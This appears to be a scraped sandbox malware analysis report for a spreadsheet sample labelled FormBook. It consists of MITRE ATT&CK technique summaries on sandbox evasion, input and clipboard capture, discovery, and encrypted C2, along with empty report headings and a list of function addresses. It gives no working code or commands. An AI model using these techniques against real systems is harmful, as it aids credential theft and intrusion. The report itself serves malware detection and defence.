Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	API monitoring, File monitoring, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report Swift.xlsx

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: FormBook

Yara Overview

Dropped Files

Memory Dumps

Sigma Overview

Exploits:

System Summary:

Jbx Signature Overview

AV Detection:

Exploits:

Compliance:

Spreading:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

Code Manipulations

Function 72498690, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36
filenativeCOMMON

Function 724985E0, Relevance: 1.5, APIs: 1, Instructions: 40
filenativeCOMMON

Function 724987C0, Relevance: 1.5, APIs: 1, Instructions: 30
memorynativeCOMMON

Function 724987C2, Relevance: 1.5, APIs: 1, Instructions: 29
memorynativeCOMMON

Function 72498710, Relevance: 1.5, APIs: 1, Instructions: 20
nativeCOMMON

Function 724888D0, Relevance: .1, Instructions: 92
COMMON

Function 724988B0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24
memoryCOMMON

Function 72498922, Relevance: 1.5, APIs: 1, Instructions: 31
memoryCOMMON

Function 724988E2, Relevance: 1.5, APIs: 1, Instructions: 27
memoryCOMMON

Function 72497ED0, Relevance: 1.5, APIs: 1, Instructions: 26
COMMON

Function 72498A50, Relevance: 1.5, APIs: 1, Instructions: 24
COMMON

Function 724988F0, Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

Function 025BC5F0, Relevance: 14.2, Strings: 11, Instructions: 424
COMMONCrypto

Function 0264098E, Relevance: 11.7, Strings: 9, Instructions: 401
COMMONCrypto

Function 02641238, Relevance: 10.3, Strings: 8, Instructions: 324
COMMONCrypto

Function 025AE6C1, Relevance: 9.4, Strings: 7, Instructions: 626
COMMONCrypto

Function 0259F3CF, Relevance: 9.2, Strings: 7, Instructions: 466
COMMONCrypto

Function 025BEE4C, Relevance: 8.1, Strings: 6, Instructions: 601
COMMONCrypto

Function 025A7353, Relevance: 5.5, Strings: 4, Instructions: 466
COMMONCrypto

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre